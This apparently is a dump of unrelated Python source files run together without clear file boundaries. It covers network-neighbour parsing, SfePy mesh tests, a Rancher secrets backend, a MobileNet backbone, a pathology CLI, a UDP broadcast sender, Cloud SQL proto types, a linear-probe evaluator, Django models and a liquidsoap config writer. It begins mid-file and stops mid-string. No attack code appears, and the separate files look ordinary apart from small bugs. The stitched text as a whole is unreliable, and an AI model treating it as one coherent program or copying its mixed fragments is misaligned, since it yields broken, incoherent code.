vnet0 """ rx_ladvdc = re.compile( r"(?P\S+)\s+(?P\S+)\s+" r"CDP\s+\d+\s+\S+\s+(?P\S+)\s+\n", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) """ $ lldpcli show neighbors summary ------------------------------------------------------------------------------- LLDP neighbors: ------------------------------------------------------------------------------- Interface: enp2s0, via: CDPv2 Chassis: ChassisID: local gsw2-73-sar SysName: gsw2-73-sar Port: PortID: ifname GigabitEthernet1/0/4 PortDescr: GigabitEthernet1/0/4 ------------------------------------------------------------------------------- """ rx_lldpd = re.compile( r"Interface:\s+(?P\S+), via: CDPv2\n" r"\s+Chassis:\s+\n" r"\s+ChassisID:\s+\S+\s(?P\S+)\n" r"\s+SysName:\s+\S+\n" r"\s+Port:\s+\n" r"\s+PortID:\s+ifname (?P\S+)\n", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) # Linux interface regex check_ifcfg = re.compile( r"(bond\d+|eno\d+|ens\d+|enp\d+s\d+|en[0-9a-fA-F]{8}|eth\d+|vnet\d+)", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) def execute(self): """ https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/ """ device_id = self.scripts.get_fqdn() # Get neighbors neighbors = [] map = { "INTERFACE": "local_interface", "HOSTNAME": "device_id", "PORTNAME": "remote_interface", } # try ladvdc id_last = 999 v = self.cli("ladvdc -b -C") if "INTERFACE" in v: for l in v.splitlines(): name, value = l.split("=") id = int(name.split("_")[-1]) name2 = "".join(name.split("_")[:-1]) if name2 not in map: continue if id != id_last: neighbors += [{map[name2]: value.strip("'")}] # print value.strip("'") else: if map[name2] == "remote_interface": neighbors[id][map[name2]] = self.profile.convert_interface_name_cisco( value.strip("'") ) # print map[name2] else: neighbors[id][map[name2]] = value.strip("'") # print map[name2], value.strip("'") id_last = id return {"device_id": device_id, "neighbors": neighbors} """ # Regexp block for match in self.rx_ladvdc.finditer(self.cli("ladvdc -C")): # ladvdc show remote CISCO(!!!) interface -> "Gi1/0/4" # but cisco.iso profile need remote interface -> "Gi 1/0/4" !!! # check and convert remote_interface if remote host CISCO if re.match(check_ifcfg, match.group("remote_interface")): remote_if = match.group("remote_interface") else: remote_if = self.profile.convert_interface_name_cisco(match.group("remote_interface")) neighbors += [{ "device_id": match.group("device_id"), "local_interface": match.group("local_interface"), "remote_interface": remote_if, }] """ # try lldpd for match in self.rx_lldpd.finditer(self.cli("lldpcli show neighbors summary")): if self.check_ifcfg.match(match.group("remote_interface")): remote_if = match.group("remote_interface") else: remote_if = self.profile.convert_interface_name_cisco( match.group("remote_interface") ) neighbors += [ { "device_id": match.group("device_id"), "local_interface": match.group("local_interface"), "remote_interface": remote_if, } ] return {"device_id": device_id, "neighbors": neighbors} Gkdnz/SfePy from sfepy.base.testing import TestCommon import numpy as nm from sfepy import data_dir from sfepy.mesh.splinebox import SplineBox, SplineRegion2D from sfepy.mesh.bspline import BSpline from sfepy.discrete.fem import Mesh def tetravolume(cells, vertices): vol = 0.0 c1 = nm.ones((4,4), dtype=nm.float64) mul = 1.0 / 6.0 for ic in cells: c1[:,:3] = vertices[ic,:] vol += mul * nm.linalg.det(c1) return -vol tolerance = 1e-6 class Test(TestCommon): @staticmethod def from_conf(conf, options): return Test(conf=conf, options=options) def test_spbox_3d(self): """ Check volume change of the mesh which is deformed using the SplineBox functions. """ from sfepy.discrete.fem import Mesh from sfepy.mesh.splinebox import SplineBox mesh = Mesh.from_file(data_dir + '/meshes/3d/cylinder.vtk') conn = mesh.get_conn('3_4') vol0 = tetravolume(conn, mesh.coors) bbox = nm.array(mesh.get_bounding_box()).T spbox = SplineBox(bbox, mesh.coors) cpoints0 = spbox.get_control_points(init=True) for ii in range(4): for jj in range(4): spbox.move_control_point((0, ii, jj), [-0.02, 0, 0]) coors = spbox.evaluate() vol1 = tetravolume(conn, coors) mesh.coors[:] = coors spbox.set_control_points(cpoints0) coors = spbox.evaluate() vol2 = tetravolume(conn, coors) ok = True actual_volumes = (vol0, vol1, vol2) expected_volumes = (1.22460186e-4, 1.46950423e-4, 1.22460186e-4) for ii in range(3): relerr = abs(actual_volumes[ii] - expected_volumes[ii])\ / expected_volumes[ii] ok = ok and (relerr < tolerance) if not ok: self.report('expected volumes:') self.report(expected_volumes) self.report('actual volumes:') self.report(actual_volumes) return ok def test_spbox_2d(self): """ Check position of a given vertex in the deformed mesh. """ mesh = Mesh.from_file(data_dir + '/meshes/2d/square_tri1.mesh') spb = SplineBox([[-1, 1], [-1, 0.6]], mesh.coors, nsg=[2,1]) spb.move_control_point(1, [0.1, -0.2]) spb.move_control_point(2, [0.2, -0.3]) spb.move_control_point(3, [0.0, -0.1]) pt0 = mesh.coors[175,:].copy() mesh.cmesh.coors[:] = spb.evaluate() pt1 = mesh.coors[175,:] expected_distance = 0.165892726387 actual_distance = nm.linalg.norm(pt0 - pt1) ok = nm.fabs(actual_distance - expected_distance)\ / expected_distance < tolerance if not ok: self.report('expected distance:') self.report(expected_distance) self.report('actual distance:') self.report(actual_distance) return ok def test_spregion2d(self): """ Check position of a given vertex in the deformed mesh. """ line_l = nm.array([[-1, 1], [-1, .5], [-1, 0], [-1, -.5]]) line_r = nm.array([[0, -.2], [.1, .2], [.3, .6], [.4, 1]]) sp_l = BSpline(3, is_cyclic=False) sp_l.approximate(line_l, ncp=4) kn_lr = sp_l.get_knot_vector() sp_r = BSpline(3, is_cyclic=False) sp_r.approximate(line_r, knots=kn_lr) line_b = nm.array([[-1, -.5], [-.8, -.6], [-.5, -.4], [-.2, -.2], [0, -.2]]) line_t = nm.array([[.4, 1], [0, 1], [-.2, 1], [-.6, 1], [-1, 1]]) sp_b = BSpline(3, is_cyclic=False) sp_b.approximate(line_b, ncp=5) kn_bt = sp_b.get_knot_vector() sp_t = BSpline(3, is_cyclic=False) sp_t.approximate(line_t, knots=kn_bt) mesh = Mesh.from_file(data_dir + '/meshes/2d/square_tri1.mesh') spb = SplineRegion2D([sp_b, sp_r, sp_t, sp_l], mesh.coors) spb.move_control_point(5, [-.2, .1]) spb.move_control_point(10, [-.3, .2]) spb.move_control_point(15, [-.1, .2]) pt0 = mesh.coors[145,:].copy() mesh.cmesh.coors[:] = spb.evaluate() pt1 = mesh.coors[145,:] expected_distance = 0.0908306614584 actual_distance = nm.linalg.norm(pt0 - pt1) ok = nm.fabs(actual_distance - expected_distance)\ / expected_distance < tolerance if not ok: self.report('expected distance:') self.report(expected_distance) self.report('actual distance:') self.report(actual_distance) return ok import os from .base_backend import BaseBackend from compose_flow.kube.mixins import KubeMixIn from compose_flow import shell class RancherBackend(BaseBackend, KubeMixIn): """ Manages Kubernetes Secret storage via Rancher CLI """ kubectl_command = "rancher kubectl" env_key = "_env" @property def namespace(self): return f"compose-flow-{self.project_name.lower()}" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.secret_exists = None self.workflow = kwargs.get("workflow") self.switch_rancher_context() self._check_rancher_namespace() def execute(self, command: str, **kwargs): env = os.environ return shell.execute(command, env, **kwargs) def ls(self) -> list: """List kubectl secrets in the proper namespace""" return self._list_secrets() def read(self, name: str) -> str: return self._read_secret_env(name) def rm(self, name: str) -> None: self._remove_secret(name) def write(self, name: str, path) -> None: """ Saves an environment into a Secret """ return self._write_secret_env(name, path) qixiuai/vega # -*- coding:utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """Backbone of mobilenet v2.""" from torchvision.models import MobileNetV2 import torch import torch.nn as nn class MobileNetV2Backbone(MobileNetV2): """Backbone of mobilenet v2.""" def __init__(self, load_path=None): """Construct MobileNetV3Tiny class. :param load_path: path for saved model """ super(MobileNetV2Backbone, self).__init__() self.features = nn.ModuleList(list(self.features)[:18]) if load_path is not None: self.load_state_dict(torch.load(load_path), strict=False) def forward(self, x): """Do an inference on MobileNetV2. :param x: input tensor :return: output tensor """ outs = [] for i, feature in enumerate(self.features): x = feature(x) if i in [3, 6, 13, 17]: outs.append(x) return outs # -*- coding: utf-8 -*- """Console script for dicom_wsi.""" import argparse import logging import sys from digipath_mltk.toolkit import * def parse_args(): """Console script for DigiPath_MLTK.""" parser = argparse.ArgumentParser() parser.add_argument("-m", "--method", dest='method', default='wsi_to_patches_dir', choices=['wsi_to_tfrecord', 'tfrecord_to_masked_thumb', 'wsi_to_patches_dir', 'write_mask_preview_set', 'registration_to_dir', 'registration_to_tfrecord', 'annotations_to_dir', 'annotations_to_tfrecord'], help="Method to run") parser.add_argument("-i", "--wsi_filename", dest='wsi_filename', required=True, help="WSI File name") parser.add_argument("-f", "--wsi_floatname", dest='wsi_floatname', required=False, help="offset WSI File name") parser.add_argument("-o", "--output_dir", dest='output_dir', default='.', help="Where to write the images out") parser.add_argument("-c", "--class_label", dest='class_label', default='training_data', help="label name fields for training") parser.add_argument("-d", "--thumbnail_divisor", dest='thumbnail_divisor', default=10, help="Full size divisor to create thumbnail image") parser.add_argument("-S", "--pixel_hw", dest='pixel_hw', default=512, help="Patch size") parser.add_argument("-P", "--patch_select_method", dest='patch_select_method', default='threshold_rgb2lab', choices=['threshold_rgb2lab', 'threshold_otsu'], help="Tissue detection method") parser.add_argument("-T", "--rgb2lab_threshold", dest='rgb2lab_threshold', default=80, help="Detection threshold for rgb2lab detector") parser.add_argument("-e", "--image_level", dest='image_level', default=0, help="Image zoom level") parser.add_argument("-l", "--file_ext", dest='file_ext', default='.png', choices=['.png', '.jpg'], help="Image format type") parser.add_argument("-t", "--threshold", dest='threshold', default=0, help="Image detail & patch size dependent threshold") parser.add_argument("-s", "--patch_stride_fraction", dest='patch_stride_fraction', default=1.0, help="Patch Stride [0-1]") parser.add_argument("-x", "--offset_x", dest='offset_x', default=0, help="Begin at x position") parser.add_argument("-y", "--offset_y", dest='offset_y', default=0, help="Begin at y position") parser.add_argument("-C", "--border_color", dest='border_color', default='blue', help="Border color for mask previews") parser.add_argument("-V", "--verbose", dest="logLevel", choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default="INFO", help="Set the logging level") parser.add_argument("-r", "--tfrecord_file_name", dest='tfrecord_file_name', required=False, help="TFRecord File name") parser.add_argument("-D", "--offset_data_file", dest='offset_data_file', required=False, help="registration offset data file name") parser.add_argument("-a", "--xml_file_name", dest='xml_file_name', required=False, help="xml annotations data file name") parser.add_argument("-L", "--csv_file_name", dest='csv_file_name', required=False, help="annotations priority data file name") args = parser.parse_args() logging.basicConfig(stream=sys.stderr, level=args.logLevel, format='%(name)s (%(levelname)s): %(message)s') logger = logging.getLogger(__name__) logger.setLevel(args.logLevel) run_parameters = dict() run_parameters['method'] = args.method run_parameters['wsi_filename'] = args.wsi_filename run_parameters['wsi_floatname'] = args.wsi_floatname run_parameters['output_dir'] = args.output_dir run_parameters['class_label'] = args.class_label run_parameters['thumbnail_divisor'] = int(args.thumbnail_divisor) run_parameters['patch_height'] = int(args.pixel_hw) run_parameters['patch_width'] = int(args.pixel_hw) run_parameters['patch_select_method'] = args.patch_select_method run_parameters['rgb2lab_threshold'] = int(args.rgb2lab_threshold) run_parameters['image_level'] = int(args.image_level) run_parameters['file_ext'] = args.file_ext run_parameters['threshold'] = int(args.threshold) run_parameters['patch_stride_fraction'] = float(args.patch_stride_fraction) run_parameters['offset_x'] = int(args.offset_x) run_parameters['offset_y'] = int(args.offset_y) run_parameters['border_color'] = args.border_color run_parameters['tfrecord_file_name'] = args.tfrecord_file_name run_parameters['offset_data_file'] = args.offset_data_file run_parameters['xml_file_name'] = args.xml_file_name run_parameters['csv_file_name'] = args.csv_file_name clean_run_parameters = dict() for k, v in run_parameters.items(): if not v is None: clean_run_parameters[k] = v return clean_run_parameters if __name__ == "__main__": run_parameters = parse_args() if run_parameters['method'] == 'wsi_to_tfrecord': wsi_file_to_patches_tfrecord(run_parameters) if run_parameters['method'] == 'tfrecord_to_masked_thumb': write_tfrecord_marked_thumbnail_image(run_parameters) if run_parameters['method'] == 'wsi_to_patches_dir': image_file_to_patches_directory_for_image_level(run_parameters) if run_parameters['method'] == 'write_mask_preview_set': write_mask_preview_set(run_parameters) if run_parameters['method'] == 'registration_to_dir': run_registration_pairs(run_parameters) if run_parameters['method'] == 'registration_to_tfrecord': run_registration_pairs(run_parameters) if run_parameters['method'] == 'annotations_to_dir': run_annotated_patches(run_parameters) if run_parameters['method'] == 'annotations_to_tfrecord': run_annotated_patches(run_parameters) d0i/lhcast #!/usr/bin/env python """ receives output of lhsplit from stdin and send the segments with broadcast. (initial header segment will be sent multiple times to avoid packet loss) WISH: - sort of reliable protocol for headers hdr-ack shall start body block transfer - sort of reliable data-ack/nack from receivers (nack shall have bitmap of unseen blocks for re-send) NOW(initial test implementation: - just find block boundary and send each block in UDP! This software is part of lhcast Copyright 2015 <> """ import struct import sys import os import socket import pdb import time from lhcommon import * # hidden option TARGET=os.getenv("LHSND_TARGET", TARGET) if __name__ == '__main__': inf = sys.stdin sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) k=None m=None blksz=None while True: pkt = [] # read a byte ts = inf.read(1) if ts == '': break; pkt.append(ts) t = ord(ts) if (t == HTYPE_SEGHDR): # if the byte is HTYPE_SEGHDR, read the header and find the block/segment size. hdr_s = inf.read(SEGHDR_LEN) hdr_t = list(struct.unpack(SEGHDR_FMT, hdr_s)) hdr_t.pop(0)#padding seguid = hdr_t[:SEGUID_LEN] hdr_t = hdr_t[SEGUID_LEN:] k = hdr_t.pop(0) m = hdr_t.pop(0) blksz = hdr_t.pop(0) print 'HDR(k: %d, m: %d, blksz: %d)'%(k, m, blksz) pkt.append(hdr_s) elif (t == HTYPE_BLKHDR): # if the byte is HTYPE_BLKHDR and I already know the segment parameters, read a block hdr_s = inf.read(BLKHDR_LEN) hdr_t = struct.unpack(BLKHDR_FMT, hdr_s) blkid = hdr_t[0] print 'BLK(id: %d)'%(blkid,) pkt.append(hdr_s) pkt.append(inf.read(blksz)) else: raise RuntimeError, "unknown blktype %d"%(t) # then, send the block to the dgram sock. pkt_bytes = ''.join(pkt) sock.sendto(pkt_bytes, (TARGET, PORT)) # print 'Done.' cities = set(input().split()) ox_cities = set(input().split()) lion_cities = set(input().split()) eagle_ox_cities = set(input().split()) lion_eagle_cities = set(input().split()) eagle_ox_lion_cities = eagle_ox_cities.union(lion_eagle_cities) diff_lion_ox = lion_cities.difference(eagle_ox_lion_cities).union(ox_cities.difference(eagle_ox_lion_cities)) eagle_cities = ' '.join(sorted([i for i in cities if i not in diff_lion_ox])) if len(eagle_cities) == 0: print('Нет таких городов') else: print(eagle_cities) 1-10 from dataclasses import dataclass from typing import List from typing import Union from postmanparser.exceptions import MissingRequiredFieldException @dataclass class Cookie: domain: str path: str expires: Union[str, None] = None max_age: str = "" host_only: bool = False http_only: bool = False name: str = "" secure: bool = False session: bool = False value: str = "" extensions: List = None @classmethod def parse(cls, data: dict): domain = data.get("domain") path = data.get("path") if domain is None or path is None: raise MissingRequiredFieldException( "'cookie' object should have 'domain' and 'path' property." ) return cls( domain, path, expires=data.get("expires"), max_age=data.get("maxAge", ""), host_only=data.get("hostOnly", False), http_only=data.get("httpOnly", False), name=data.get("name", ""), secure=data.get("secure", False), session=data.get("session", False), value=data.get("value", ""), extensions=data.get("extensions"), ) 0 import numpy import pandas as pd from pandas_datareader import data as wb pg = wb.DataReader('PG', data_source='yahoo', start='2020-01-01') print (pg) # -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore from google.cloud.sql_v1.types import cloud_sql_resources from google.protobuf import wrappers_pb2 # type: ignore __protobuf__ = proto.module( package='google.cloud.sql.v1', manifest={ 'SqlFlagType', 'SqlFlagsListRequest', 'FlagsListResponse', 'Flag', }, ) class SqlFlagType(proto.Enum): r"""""" SQL_FLAG_TYPE_UNSPECIFIED = 0 BOOLEAN = 1 STRING = 2 INTEGER = 3 NONE = 4 MYSQL_TIMEZONE_OFFSET = 5 FLOAT = 6 REPEATED_STRING = 7 class SqlFlagsListRequest(proto.Message): r"""Flags list request. Attributes: database_version (str): Database type and version you want to retrieve flags for. By default, this method returns flags for all database types and versions. """ database_version = proto.Field( proto.STRING, number=1, ) class FlagsListResponse(proto.Message): r"""Flags list response. Attributes: kind (str): This is always **sql#flagsList**. items (Sequence[google.cloud.sql_v1.types.Flag]): List of flags. """ kind = proto.Field( proto.STRING, number=1, ) items = proto.RepeatedField( proto.MESSAGE, number=2, message='Flag', ) class Flag(proto.Message): r"""A flag resource. Attributes: name (str): This is the name of the flag. Flag names always use underscores, not hyphens, for example: **max_allowed_packet** type_ (google.cloud.sql_v1.types.SqlFlagType): The type of the flag. Flags are typed to being **BOOLEAN**, **STRING**, **INTEGER** or **NONE**. **NONE** is used for flags which do not take a value, such as **skip_grant_tables**. applies_to (Sequence[google.cloud.sql_v1.types.SqlDatabaseVersion]): The database version this flag applies to. Can be **MYSQL_8_0**, **MYSQL_5_6**, or **MYSQL_5_7**. allowed_string_values (Sequence[str]): For **STRING** flags, a list of strings that the value can be set to. min_value (google.protobuf.wrappers_pb2.Int64Value): For **INTEGER** flags, the minimum allowed value. max_value (google.protobuf.wrappers_pb2.Int64Value): For **INTEGER** flags, the maximum allowed value. requires_restart (google.protobuf.wrappers_pb2.BoolValue): Indicates whether changing this flag will trigger a database restart. Only applicable to Second Generation instances. kind (str): This is always **sql#flag**. in_beta (google.protobuf.wrappers_pb2.BoolValue): Whether or not the flag is considered in beta. allowed_int_values (Sequence[int]): Use this field if only certain integers are accepted. Can be combined with min_value and max_value to add additional values. """ name = proto.Field( proto.STRING, number=1, ) type_ = proto.Field( proto.ENUM, number=2, enum='SqlFlagType', ) applies_to = proto.RepeatedField( proto.ENUM, number=3, enum=cloud_sql_resources.SqlDatabaseVersion, ) allowed_string_values = proto.RepeatedField( proto.STRING, number=4, ) min_value = proto.Field( proto.MESSAGE, number=5, message=wrappers_pb2.Int64Value, ) max_value = proto.Field( proto.MESSAGE, number=6, message=wrappers_pb2.Int64Value, ) requires_restart = proto.Field( proto.MESSAGE, number=7, message=wrappers_pb2.BoolValue, ) kind = proto.Field( proto.STRING, number=8, ) in_beta = proto.Field( proto.MESSAGE, number=9, message=wrappers_pb2.BoolValue, ) allowed_int_values = proto.RepeatedField( proto.INT64, number=10, ) __all__ = tuple(sorted(__protobuf__.manifest)) 1-10 #!/usr/bin/env python # coding: utf-8 import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets, models, transforms from torch.utils.data import DataLoader, ConcatDataset, Subset import os import inspect import argparse from tqdm import tqdm from pathlib import Path from collections import OrderedDict from sklearn.linear_model import Ridge from sklearn.linear_model import LogisticRegression as LogReg from sklearn.metrics import confusion_matrix, precision_recall_curve from sklearn.utils._testing import ignore_warnings from sklearn.exceptions import ConvergenceWarning from sklearn.preprocessing import StandardScaler from sklearn.metrics import r2_score from sklearn.model_selection import KFold import numpy as np import model_utils from datasets import Flowers, Caltech101, FacesInTheWild300W, CelebA, LeedsSportsPose dataset_info = { 'cifar10': { 'class': datasets.CIFAR10, 'dir': 'CIFAR10', 'num_classes': 10, 'splits': ['train', 'train', 'test'], 'split_size': 0.8, 'mode': 'classification' }, 'flowers': { 'class': Flowers, 'dir': 'Flowers', 'num_classes': 102, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'mode': 'classification' }, 'caltech101': { 'class': Caltech101, 'dir': 'Caltech101', 'num_classes': 102, 'splits': ['train', 'train', 'test'], 'split_size': 0.5, 'mode': 'classification' }, '300w': { 'class': FacesInTheWild300W, 'dir': '300W', 'num_classes': None, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'mode': 'regression' }, 'celeba': { 'class': CelebA, 'dir': 'CelebA', 'num_classes': 40, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'target_type': 'landmarks', 'mode': 'regression' }, 'leeds_sports_pose': { 'class': LeedsSportsPose, 'dir': 'LeedsSportsPose', 'num_classes': None, 'splits': ['train', 'train', 'test'], 'split_size': 0.8, 'mode': 'regression' } } class LogisticRegression(nn.Module): def __init__(self, input_dim, num_features, num_classes, multilabel, metric): super().__init__() self.input_dim = input_dim self.num_classes = num_classes self.multilabel = multilabel self.metric = metric self.clf = LogReg(solver='lbfgs', multi_class='multinomial', warm_start=True) print('Logistic regression:') print(f'\t solver = L-BFGS') print(f"\t classes = {self.num_classes}") print(f"\t multilabel = {self.multilabel}") print(f"\t metric = {self.metric}") def set_params(self, d): self.clf.set_params(**d) @ignore_warnings(category=ConvergenceWarning) def fit(self, X_train, y_train, X_test, y_test): if not self.multilabel: self.clf = self.clf.fit(X_train, y_train) test_acc = self.clf.score(X_test, y_test) pred_test = self.clf.predict(X_test) #Get the confusion matrix cm = confusion_matrix(y_test, pred_test) if self.metric == 'mean per-class accuracy': _cm = cm.diagonal() / cm.sum(axis=1) test_acc = _cm.mean() return test_acc, cm else: per_class_acc = [] for cls in range(self.num_classes): self.clf.fit(X_train, y_train[:, cls]) acc = self.clf.score(X_test, y_test[:, cls]) per_class_acc.append(acc) test_acc = np.mean(per_class_acc) return test_acc, per_class_acc class LinearRegression(nn.Module): def __init__(self, input_dim, num_features): super().__init__() self.input_dim = input_dim self.num_features = num_features self.clf = Ridge() def set_params(self, d): d['alpha'] = d['C'] del d['C'] self.clf.set_params(**d) @ignore_warnings(category=ConvergenceWarning) def fit(self, X_train, y_train, X_test, y_test, metric='r2'): self.clf = self.clf.fit(X_train, y_train) r2 = self.clf.score(X_test, y_test) mse_loss = F.mse_loss(torch.from_numpy(self.clf.predict(X_test)), torch.from_numpy(y_test)).item() if metric =='mse': return mse_loss, None elif metric == 'r2': return r2, None class CVTester(): def __init__(self, mode, model, trainval, test, device, num_classes, num_features, k=5, batch_size=256, feature_dim=2048, wd_range=None, debug=False): self.mode = mode self.model = model self.trainval = trainval self.test = test self.kf = KFold(n_splits=k, shuffle=True) self.batch_size = batch_size self.device = device self.num_classes = num_classes self.feature_dim = feature_dim self.debug = debug self.best_params = {} self.X_trainval_feature, self.y_trainval = self._inference(self.trainval, self.model, 'trainval') self.X_test_feature, self.y_test = self._inference(self.test, self.model, 'test') multilabel = (mode == 'multi-label classification') metric = 'mean per-class accuracy' if bool( sum([isinstance(trainval, d) for d in [Caltech101, Flowers]]) ) else 'accuracy' if wd_range is None: self.wd_range = torch.logspace(-6, 5, 45) else: self.wd_range = wd_range if 'classification' in self.mode: self.classifier = LogisticRegression(self.feature_dim, num_features, self.num_classes, multilabel, metric).to(self.device) elif self.mode == 'regression': self.classifier = LinearRegression(self.feature_dim, num_features).to(self.device) def _inference(self, data_set, model, split): model.eval() feature_vector = [] labels_vector = [] loader = DataLoader(data_set, batch_size=self.batch_size, shuffle=True) for i, data in enumerate(tqdm(loader, desc=f'Computing features for {split} set')): if self.debug and i >= 100: print('DEBUG: stopping early.') break batch_x, batch_y = data batch_x = batch_x.to(self.device) labels_vector.extend(np.array(batch_y)) features = model(batch_x) feature_vector.extend(features.cpu().detach().numpy()) feature_vector = np.array(feature_vector) if 'classification' in self.mode: labels_vector = np.array(labels_vector, dtype=int) else: labels_vector = np.array(labels_vector) return feature_vector, labels_vector def validate(self): best_score = -np.inf for wd in tqdm(self.wd_range, desc='Cross-validating'): C = 1. / wd.item() self.classifier.set_params({'C': C}) cv_scores = [] for i, (train, val) in enumerate(self.kf.split(self.X_trainval_feature)): test_score, _ = self.classifier.fit(self.X_trainval_feature[train], self.y_trainval[train], self.X_trainval_feature[val], self.y_trainval[val]) cv_scores.append(test_score) score = np.mean(cv_scores) #print(f'{C}: {score}, {cv_scores}') if score > best_score: best_score = score self.best_params['C'] = C def evaluate(self): print(f"Best hyperparameters {self.best_params}") self.classifier.set_params({'C': self.best_params['C']}) test_score, per_class_acc = self.classifier.fit(self.X_trainval_feature, self.y_trainval, self.X_test_feature, self.y_test) return test_score, per_class_acc def get_dataset(args, c, d, s, t): if d == 'CelebA': return c(os.path.join(args.data_root, d), split=s, target_type=dataset_info[args.dataset]['target_type'], transform=t, download=True) elif d == 'CIFAR10': return c(os.path.join(args.data_root, d), train=s == 'train', transform=t, download=True) else: if 'split' in inspect.getfullargspec(c.__init__)[0]: if s == 'valid': try: return c(os.path.join(args.data_root, d), split=s, transform=t) except: return c(os.path.join(args.data_root, d), split='val', transform=t) else: return c(os.path.join(args.data_root, d), split=s, transform=t) else: return c(os.path.join(args.data_root, d), train=s == 'train', transform=t) def prepare_data(args, norm): transform = transforms.Compose([ transforms.Resize(args.resize), transforms.CenterCrop(args.crop_size), transforms.ToTensor(), transforms.Normalize(*norm) ]) if dataset_info[args.dataset]['splits'][1] == 'val': train_dataset = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'train', transform) val_dataset = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'valid', transform) trainval = ConcatDataset([train_dataset, val_dataset]) elif dataset_info[args.dataset]['splits'][1] == 'train': trainval = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'train', transform) test = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'test', transform) return trainval, test if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--model', default='default', type=str, metavar='M', help='model to evaluate invariance of (random/supervised/default/ventral/dorsal)') parser.add_argument('--fuse-mode', default='cat', type=str, metavar='F', help='method of fusing multiple representations (cat/add/mean)') parser.add_argument('--dataset', default='cifar10', type=str, metavar='DS', help='dataset to evaluate on') parser.add_argument('--cv-folds', default=5, type=int, help='number of cross-validation folds (default: 5)') parser.add_argument('--device', default='cuda:0', type=str, metavar='D', help='GPU device') parser.add_argument('--feature-layer', default='backbone', type=str, metavar='F', help='layer to extract features from (default: backbone)') parser.add_argument('--batch-size', default=64, type=int, metavar='N', help='mini-batch size') parser.add_argument('--resize', default=224, type=int, metavar='R', help='resize') parser.add_argument('--crop-size', default=224, type=int, metavar='C', help='crop size') parser.add_argument('--ckpt-dir', default='./models/', type=Path, metavar='DIR', help='path to checkpoint directory') parser.add_argument('--results-dir', default='./results', type=Path, metavar='DIR', help='path to results directory') parser.add_argument('--data-root', default='../data/', type=Path, metavar='DIR', help='data root directory') parser.add_argument('--quick', dest='quick', action='store_true') parser.set_defaults(quick=False) args = parser.parse_args() args.dataset = args.dataset.lower() trainval, test = prepare_data(args, norm=model_utils.imagenet_mean_std) models_list = [model_utils.load_model(model_name, args) for model_name in args.model.split('+')] model = model_utils.ModelCombiner(args.fuse_mode, *models_list) model.to(args.device) c = 2 if 'w3' in args.model else args.model.count('+') wd_range = torch.logspace(-6 + 2 * c, 5 + 2 * c, 45) print(f'Searching regularisation parameter in {wd_range}') clf = CVTester(dataset_info[args.dataset]['mode'], model, trainval, test, device=args.device, batch_size=args.batch_size, k=args.cv_folds, num_classes=dataset_info[args.dataset]['num_classes'], num_features=len(models_list), wd_range=wd_range, debug=args.quick) clf.validate() test_acc, per_class_acc = clf.evaluate() print(f'{args.model} on {args.dataset}: {test_acc:.2f}') torch.save(test_acc, open(f'{args.results_dir}/{args.model}_{args.dataset}.pth', 'wb')) # This is an auto-generated Django model module. # You'll have to do the following manually to clean this up: # * Rearrange models' order # * Make sure each model has one field with primary_key=True # * Make sure each ForeignKey has `on_delete` set to the desired behavior. # * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table # Feel free to rename the models, but don't rename db_table values or field names. from __future__ import unicode_literals from django.db import models class Company(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=100, unique=True) class Meta: db_table = 'company' def __unicode__(self): return "{name}".format( name = self.name) class Contact(models.Model): name = models.CharField(max_length=150, unique=True) company = models.ForeignKey('Company') note = models.CharField(max_length=250) class Meta: db_table = 'contact' def __unicode__(self): return "{name} @ {company}".format( name = self.name, comapny = self.company.name) krattai/AEBLinterfaces/ATS_VM/python_apps/pypo/liquidsoap_scripts/generate_liquidsoap_cfg.py import logging import sys import time import traceback from api_clients.api_client import AirtimeApiClient def generate_liquidsoap_config(ss): data = ss['msg'] fh = open('/etc/airtime/liquidsoap.cfg', 'w') fh.write("################################################\n") fh.write("# THIS FILE IS AUTO GENERATED. DO NOT CHANGE!! #\n") fh.write("################################################\n") for d in data: key = d['keyname'] str_buffer = d[u'keyname'] + " = " if d[u'type'] == 'string': val = '"%s"' % d['value'] else: val = d[u'value'] val = val if len(val) > 0 else "0" str_buffer = "%s = %s\n" % (key, val) fh.write(str_buffer.encode('utf-8')) fh.write('log_file = "/var/log/airtime/pypo-liquidsoap/